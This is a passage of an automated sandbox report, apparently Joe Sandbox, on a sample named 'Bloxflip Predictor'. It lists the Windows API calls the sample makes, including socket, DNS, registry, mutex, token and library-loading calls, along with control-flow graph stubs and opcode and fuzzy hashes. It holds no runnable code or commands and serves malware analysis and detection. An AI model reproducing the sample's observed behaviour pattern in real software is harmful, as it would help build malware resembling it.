                                            control_flow_graph 67 5ee05a6-5ee0651 71 5ee0686-5ee068b 67->71 72 5ee0653-5ee0666 GetFileType 67->72 71->72 73 5ee068d-5ee0692 72->73 74 5ee0668-5ee0685 72->74 73->74
                                            APIs
                                            • GetFileType.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 655d46434d71e2e96acde003c016fa01fbbf76b1b152cc8cc179a031b45c6f3d
                                            • Instruction ID: 784e28d856166c757443382e662f9e9ca14e806b8a2dc91a830d76d642139193
                                            • Opcode Fuzzy Hash: 655d46434d71e2e96acde003c016fa01fbbf76b1b152cc8cc179a031b45c6f3d
                                            • Instruction Fuzzy Hash: F7314B6104E3C06FE7138B219C54BA2BFB89F57614F0985DBE9C48F5A3D268A809C772

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 78 5ee0bbc-5ee0bd3 80 5ee0bf5-5ee0c66 78->80 81 5ee0bd5-5ee0bf2 78->81 86 5ee0c68-5ee0c70 WSASocketW 80->86 87 5ee0cb7-5ee0cbc 80->87 81->80 88 5ee0c76-5ee0c8c 86->88 87->86 90 5ee0cbe-5ee0cc3 88->90 91 5ee0c8e-5ee0cb4 88->91 90->91
                                            APIs
                                            • WSASocketW.WS2_32(?,?,?,?,?), ref: 05EE0C6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Socket
                                            • String ID:
                                            • API String ID: 38366605-0
                                            • Opcode ID: 75873b9665c9858ba0188b203ff9b6dd606ed344513136c8e05439ed158bfa70
                                            • Instruction ID: d46948c9a6d79b59ce9973314485fd7dcf2a5774d2e2140c58300138f9899baf
                                            • Opcode Fuzzy Hash: 75873b9665c9858ba0188b203ff9b6dd606ed344513136c8e05439ed158bfa70
                                            • Instruction Fuzzy Hash: 4B3181714097C0AFE7238B61CC44F56BFB5AF16314F0984DAE9858B5A3D365A808CB62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 130 5ee1f5a-5ee1fed 134 5ee1fef 130->134 135 5ee1ff2-5ee1ffe 130->135 134->135 136 5ee204d-5ee2052 135->136 137 5ee2000-5ee2008 RegOpenKeyExW 135->137 136->137 138 5ee200e-5ee2020 137->138 140 5ee2054-5ee2059 138->140 141 5ee2022-5ee204a 138->141 140->141
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE2006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 48687b96369008d2f3c9ae0173e417a0b3f518a56b47e0f215c0088df6280ad5
                                            • Instruction ID: 21e48c7382a6b3ff10cfa46adca2e709f00ef5d4b91fd23988cffea44a3448e5
                                            • Opcode Fuzzy Hash: 48687b96369008d2f3c9ae0173e417a0b3f518a56b47e0f215c0088df6280ad5
                                            • Instruction Fuzzy Hash: 003195B1509384AFE7228F20DC44FA6BFB8EF16314F08849AE9858B253D234D90DC771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 100 5ee170c-5ee17a1 106 5ee17ee-5ee17f3 100->106 107 5ee17a3-5ee17ab GetProcessTimes 100->107 106->107 108 5ee17b1-5ee17c3 107->108 110 5ee17f5-5ee17fa 108->110 111 5ee17c5-5ee17eb 108->111 110->111
                                            APIs
                                            • GetProcessTimes.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE17A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessTimes
                                            • String ID:
                                            • API String ID: 1995159646-0
                                            • Opcode ID: d7854dc330c47426957b6566b33ff4a2dec40973b813e29e6fee49a0068a8087
                                            • Instruction ID: 99c187c565ed01f5be6fe92862ca9fd5156382bdc51e2ef8e62f59277d5a5419
                                            • Opcode Fuzzy Hash: d7854dc330c47426957b6566b33ff4a2dec40973b813e29e6fee49a0068a8087
                                            • Instruction Fuzzy Hash: DF31D4725097806FE7228F60DC44FA6BFB8EF17724F0884DAE8858F192D271A549CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 114 5ee18d9-5ee1963 118 5ee1968-5ee1971 114->118 119 5ee1965 114->119 120 5ee1976-5ee1985 118->120 121 5ee1973 118->121 119->118 122 5ee19c9-5ee19ce 120->122 123 5ee1987-5ee198f WSAIoctl 120->123 121->120 122->123 124 5ee1995-5ee19a7 123->124 126 5ee19a9-5ee19c6 124->126 127 5ee19d0-5ee19d5 124->127 127->126
                                            APIs
                                            • WSAIoctl.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE198D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Ioctl
                                            • String ID:
                                            • API String ID: 3041054344-0
                                            • Opcode ID: 419f74018488451e8f42f77f55bfb8272f758b9583271d1c20ce3975c646b035
                                            • Instruction ID: dad1b273401e1e2aa336113ca8c7acff80e9dee4727ee1a1dd97f4ff70a88561
                                            • Opcode Fuzzy Hash: 419f74018488451e8f42f77f55bfb8272f758b9583271d1c20ce3975c646b035
                                            • Instruction Fuzzy Hash: 63319275509780AFE722CF11CC44FA2BFF8EF06714F08889AE9858B162D335E949CB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 161 5ee1008-5ee1089 165 5ee108e-5ee1097 161->165 166 5ee108b 161->166 167 5ee10ef-5ee10f4 165->167 168 5ee1099-5ee10a1 ConvertStringSecurityDescriptorToSecurityDescriptorW 165->168 166->165 167->168 169 5ee10a7-5ee10b9 168->169 171 5ee10bb-5ee10ec 169->171 172 5ee10f6-5ee10fb 169->172 172->171
                                            APIs
                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05EE109F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DescriptorSecurity$ConvertString
                                            • String ID:
                                            • API String ID: 3907675253-0
                                            • Opcode ID: d2a2cd426676804deca3c93cbd05c9f20526efaddfa7aea72338a619cdd79ebf
                                            • Instruction ID: e3e6600e8d4e0d21925b86a4c7c45c3efe7d4d7b40c7d134a522e3b449427b03
                                            • Opcode Fuzzy Hash: d2a2cd426676804deca3c93cbd05c9f20526efaddfa7aea72338a619cdd79ebf
                                            • Instruction Fuzzy Hash: D931BF71508385AFEB22CF64DC45FA7BBE8EF05214F08849AE985CB252D374E848CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 145 11bae32-11baeb5 149 11baeba-11baec3 145->149 150 11baeb7 145->150 151 11baec8-11baed1 149->151 152 11baec5 149->152 150->149 153 11baed3-11baef7 CreateMutexW 151->153 154 11baf22-11baf27 151->154 152->151 157 11baf29-11baf2e 153->157 158 11baef9-11baf1f 153->158 154->153 157->158
                                            APIs
                                            • CreateMutexW.KERNEL32(?,?), ref: 011BAED9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 65e3fb571fccccf6d091e0401c20375ab8273a1824d582f7e3711260d886d36e
                                            • Instruction ID: 884d98c6604a50eeb68c20b5e734d4bbbafe925261f4241f03915a66dbec8e7f
                                            • Opcode Fuzzy Hash: 65e3fb571fccccf6d091e0401c20375ab8273a1824d582f7e3711260d886d36e
                                            • Instruction Fuzzy Hash: 323184B15093846FE712CB25DC85B96BFF8EF16314F08849AE944CB292D375E909C762

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 176 11ba51a-11ba5b0 181 11ba5fd-11ba602 176->181 182 11ba5b2-11ba5ba GetTokenInformation 176->182 181->182 183 11ba5c0-11ba5d2 182->183 185 11ba604-11ba609 183->185 186 11ba5d4-11ba5fa 183->186 185->186
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BA5B8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 65ce0653af683b93d785caa190c3a2420e1c40dd0d64fe52a13d44247463abea
                                            • Instruction ID: 5bbefd317c65f45d57f7b291cdf180fc627c654fd440d80f09ebd7d53e3df121
                                            • Opcode Fuzzy Hash: 65ce0653af683b93d785caa190c3a2420e1c40dd0d64fe52a13d44247463abea
                                            • Instruction Fuzzy Hash: 993181715093846FD7228B65DC94FA6BFB8AF16314F0884DBE985CB152D325E908C772
                                            APIs
                                            • RegCreateKeyExW.KERNEL32(?,00000E24), ref: 05EE4991
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 4f493e679f8c021e4e9c7826eed0136956ee0c44a469a5cd4f21af95e678d968
                                            • Instruction ID: 1e57972047798fa0655da11d4fad304ebceb6361ba6b33049e869a4b3f756c6b
                                            • Opcode Fuzzy Hash: 4f493e679f8c021e4e9c7826eed0136956ee0c44a469a5cd4f21af95e678d968
                                            • Instruction Fuzzy Hash: CA21A072500205AFEB31CE15CC44FA7FBECEF18714F04855AE989D6691E721E5088B71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 189 11bb059-11bb10d 193 11bb10f-11bb117 SendMessageTimeoutA 189->193 194 11bb151-11bb156 189->194 196 11bb11d-11bb12f 193->196 194->193 197 11bb158-11bb15d 196->197 198 11bb131-11bb14e 196->198 197->198
                                            APIs
                                            • SendMessageTimeoutA.USER32(?,00000E24), ref: 011BB115
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: MessageSendTimeout
                                            • String ID:
                                            • API String ID: 1599653421-0
                                            • Opcode ID: a0660f32d5218726e3d7f13e5d572e3a52242453aa033ad1df65d654d2915f2e
                                            • Instruction ID: 0d77e74614fa97b48e046e6e379a1e2a7e138b84883c29c943f96d2f2964db4f
                                            • Opcode Fuzzy Hash: a0660f32d5218726e3d7f13e5d572e3a52242453aa033ad1df65d654d2915f2e
                                            • Instruction Fuzzy Hash: 0331D471009384AFEB228F60DC45FA2FFB8EF46314F08849EE9858B553D375A409CB65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 201 11bb241-11bb2be 205 11bb2c3-11bb2cf 201->205 206 11bb2c0 201->206 207 11bb2d1 205->207 208 11bb2d4-11bb2dd 205->208 206->205 207->208 209 11bb2df-11bb303 CreateFileW 208->209 210 11bb32e-11bb333 208->210 213 11bb335-11bb33a 209->213 214 11bb305-11bb32b 209->214 210->209 213->214
                                            APIs
                                            • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 011BB2E5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 853ebaba69c74ac12907a2a4b41a701cf181b79fee331bbc3ad23a7a86216815
                                            • Instruction ID: 74ea01fed757e53ed4ca2f74763a73e16fb512fe9a68faaff0cc4a90f377857f
                                            • Opcode Fuzzy Hash: 853ebaba69c74ac12907a2a4b41a701cf181b79fee331bbc3ad23a7a86216815
                                            • Instruction Fuzzy Hash: F1319171509340AFEB21CF65DC85F96FBE8EF15310F08849DE9498B652D375E408CB61
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAC2C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 3059f5fd3ae4b54b19a79e207ed01bf2c8dfcebfed78f557f9821cdcff6f9567
                                            • Instruction ID: 24d0e81610c85879efd1e265dbe2e673d4b40b5bd3deb9f8f3d04f0f74b263ba
                                            • Opcode Fuzzy Hash: 3059f5fd3ae4b54b19a79e207ed01bf2c8dfcebfed78f557f9821cdcff6f9567
                                            • Instruction Fuzzy Hash: 83315C75505780AFE722CF15DC85FA2BFF8EF16610F08849AE985CB292D324E949CB61
                                            APIs
                                            • GetExitCodeProcess.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4BF0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CodeExitProcess
                                            • String ID:
                                            • API String ID: 3861947596-0
                                            • Opcode ID: e78d729ac8913a5452db4280eb3add6f426d41999ebb9d953bc1851e54ff9126
                                            • Instruction ID: f139292665ff8b15b0dd116db675d48aa24bdf85e396f28c3536ba3caf5700ab
                                            • Opcode Fuzzy Hash: e78d729ac8913a5452db4280eb3add6f426d41999ebb9d953bc1851e54ff9126
                                            • Instruction Fuzzy Hash: C621F6715093C46FEB13CB20CC54B96BFA8AF46314F0884DBE9889F193D265A909C772
                                            APIs
                                            • getaddrinfo.WS2_32(?,00000E24), ref: 05EE26D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: getaddrinfo
                                            • String ID:
                                            • API String ID: 300660673-0
                                            • Opcode ID: fd7589b6077f3266282cb0403ed6b8deb139a2bee6d3e0f20f86a66c3beaa0d2
                                            • Instruction ID: 19626a4eb04b879d28e84d2e827ac81055578ad1be9daea9dffd6fea9c3f6334
                                            • Opcode Fuzzy Hash: fd7589b6077f3266282cb0403ed6b8deb139a2bee6d3e0f20f86a66c3beaa0d2
                                            • Instruction Fuzzy Hash: 8B21BFB2100204AFFB31DF60CD84FA6F7ACEF14714F04885AFA489A681E7B5E5488B71
                                            APIs
                                            • RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05EE1D05
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CurrentOpenUser
                                            • String ID:
                                            • API String ID: 1571386571-0
                                            • Opcode ID: 3436d614bcf5313dfa9ac2048f367b8eec946ac9f642d674763aa675f75b8453
                                            • Instruction ID: 47a9663836ac1af179302412ff6b4a06c4663b75cc45d3dbbb43ef0b0122023f
                                            • Opcode Fuzzy Hash: 3436d614bcf5313dfa9ac2048f367b8eec946ac9f642d674763aa675f75b8453
                                            • Instruction Fuzzy Hash: E221B4B1409384AFEB228B249C44FA6BFB8EF46314F0884DAE9448F153D274A50DCB71
                                            APIs
                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1F10
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ChangeNotifyValue
                                            • String ID:
                                            • API String ID: 3933585183-0
                                            • Opcode ID: 51aa66adda573b6f6f8c82e41acbc16cc30ec26b713a901beab97feb7fa19b03
                                            • Instruction ID: 19cfe29f3bfb154c3cbaf3b58317d44b261c51c2e1c0894eee16f480c3cfdbc8
                                            • Opcode Fuzzy Hash: 51aa66adda573b6f6f8c82e41acbc16cc30ec26b713a901beab97feb7fa19b03
                                            • Instruction Fuzzy Hash: A431D5714053846FEB22CB60DC44FA6FFB8EF56718F08889AE9849B152D374E509CBB1
                                            APIs
                                            • K32GetModuleInformation.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2DF6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            • String ID:
                                            • API String ID: 3425974696-0
                                            • Opcode ID: 34744867c5d5ed9c7a8bb1943831ff2c0962e9931867c5c71a22b9928eb7554c
                                            • Instruction ID: b4208e931b8af89741bbf8030e5acfa37344b72407b34092012d6ae25e46ef3c
                                            • Opcode Fuzzy Hash: 34744867c5d5ed9c7a8bb1943831ff2c0962e9931867c5c71a22b9928eb7554c
                                            • Instruction Fuzzy Hash: 9B2194755053846FE722CF21CC44FA6BFACEF56314F08849AE985CB162D364E908CB71
                                            APIs
                                            • K32EnumProcessModules.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2D06
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EnumModulesProcess
                                            • String ID:
                                            • API String ID: 1082081703-0
                                            • Opcode ID: 68f91427a7fb1b2da0ccce2b4cb89cae7c0abe7ca4141b39327d0c5abdb2f72f
                                            • Instruction ID: e4429d707cabe0e952ee654e141c224bc5f2eab6233dc0a8cd69526b48f85d26
                                            • Opcode Fuzzy Hash: 68f91427a7fb1b2da0ccce2b4cb89cae7c0abe7ca4141b39327d0c5abdb2f72f
                                            • Instruction Fuzzy Hash: C021B5715093806FE712CF60DC44F96BFB8EF56314F0884DAE985DF162D264A909CB71
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 05EE0ABE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 850389792c6052201ebfeb7ea829b7ce592e7b6dd20ece34b22716e71c4447f3
                                            • Instruction ID: 5dc7e072700f1f35b3f27780584a4cc96984cc77998873fdb8a24d922a7a7ea9
                                            • Opcode Fuzzy Hash: 850389792c6052201ebfeb7ea829b7ce592e7b6dd20ece34b22716e71c4447f3
                                            • Instruction Fuzzy Hash: C921C77554E3C06FD3138B258C51B62BFB4EF47610F0A81CFE9848B693D225A919D7B2
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE1E11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: b3e1eb5cf1e9c340537f4494450cd3af561ff862746936cbf6e1465b6c739e52
                                            • Instruction ID: 0aa9d1ce5a4dee71024bf11ac8477e4da55d343d0010c4e27a32de213ff8d742
                                            • Opcode Fuzzy Hash: b3e1eb5cf1e9c340537f4494450cd3af561ff862746936cbf6e1465b6c739e52
                                            • Instruction Fuzzy Hash: DB219DB2500204AFEB21DF55DD44FABBBECEF28614F04885AE945CA651E734E548CAB1
                                            APIs
                                            • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE3BC2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CertCertificateChainPolicyVerify
                                            • String ID:
                                            • API String ID: 3930008701-0
                                            • Opcode ID: 7a2b0ae79a857174695190825de7dea73dfe2a4c23ea5447f92979395ab98a56
                                            • Instruction ID: 3bf1cc270e09402c175485ee85dfcb88b7dbd653716ba64e946f392ced58e76b
                                            • Opcode Fuzzy Hash: 7a2b0ae79a857174695190825de7dea73dfe2a4c23ea5447f92979395ab98a56
                                            • Instruction Fuzzy Hash: 1B21C4715043806FE722CB21DC44FA6BFB8EF46314F0884DAE9849B152D375E448CB71
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0
                                            • Opcode ID: f00c7a5d097b43f315bcd50b42d2e27c66727e4755e5cb07c5277c282880626b
                                            • Instruction ID: a1f1ee368f281ab9379346e3d6bc72a6d8ca7871db4dc3cc27453d83c1ad1000
                                            • Opcode Fuzzy Hash: f00c7a5d097b43f315bcd50b42d2e27c66727e4755e5cb07c5277c282880626b
                                            • Instruction Fuzzy Hash: B721BF71405384AFE722CB55CC44FA6FBF8EF19324F08849EE9848B252D375E508CBA1
                                            APIs
                                            • RegSetValueExW.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAD18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 45d132e268518ea971ea7d4e42cf1fa66d658d8c4be39d4659f2b30ce3460d2c
                                            • Instruction ID: 47e8357432506f4f3ea0f6ca956f926aa2ea1277be55739a56f96b3d51395aa1
                                            • Opcode Fuzzy Hash: 45d132e268518ea971ea7d4e42cf1fa66d658d8c4be39d4659f2b30ce3460d2c
                                            • Instruction Fuzzy Hash: 1221C1725043806FDB228B15DC84FA7BFBCEF56610F08849AE985CB252D364E808CB71
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0FB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: a21defe3a7d3058df1bf99ed7c64ff42f0e537ab3e828d2617d8e72c283360cd
                                            • Instruction ID: 491883042adb53b44154e0599bf556bbfe3c13e03eee4cb048e0cdb1d26c143a
                                            • Opcode Fuzzy Hash: a21defe3a7d3058df1bf99ed7c64ff42f0e537ab3e828d2617d8e72c283360cd
                                            • Instruction Fuzzy Hash: A121A172508380AFE722CB51CC48FA7BBF8EF55714F08849AE9859B292D364E508CB71
                                            APIs
                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05EE109F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DescriptorSecurity$ConvertString
                                            • String ID:
                                            • API String ID: 3907675253-0
                                            • Opcode ID: fb0621f767013f5a61c33e73e638e93dedac7e82e42981973d0fa99409a54e8f
                                            • Instruction ID: ef9bc1efceda180979b99997f45d800df856d5b8110ae53baffc8e9a899c1d69
                                            • Opcode Fuzzy Hash: fb0621f767013f5a61c33e73e638e93dedac7e82e42981973d0fa99409a54e8f
                                            • Instruction Fuzzy Hash: 8C21BE72600244AFEB21DF25DC45FABFBACEF14614F08846AE949CA641E774E448CA71
                                            APIs
                                            • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 011BB2E5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: c78e0a02e2716d7d29e3b893a0c52c0e61324bc9b5fe220610af42d0eb9c817b
                                            • Instruction ID: 6805ca66e74181e762232909700407d1d0d042271cdeaca79257a886bee55a46
                                            • Opcode Fuzzy Hash: c78e0a02e2716d7d29e3b893a0c52c0e61324bc9b5fe220610af42d0eb9c817b
                                            • Instruction Fuzzy Hash: BC219F71505200AFEB25CF65DC85BA6FBE8EF18314F048469E9498AB51D371E408CB65
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,00000E24), ref: 05EE024B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 7d97e6ceb86c52872a67d2cd32a636843199691109c275f2821c0568c96799fd
                                            • Instruction ID: b84ab168f9e41288d7c671a5a285ec54141141295d4a55784f14f18353bc85a6
                                            • Opcode Fuzzy Hash: 7d97e6ceb86c52872a67d2cd32a636843199691109c275f2821c0568c96799fd
                                            • Instruction Fuzzy Hash: DB21D8715453806FE7228B10CC45FA2BFA8EF56714F0880DAE9449F193D264A949C771
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 011BB011
                                            Memory Dump Source
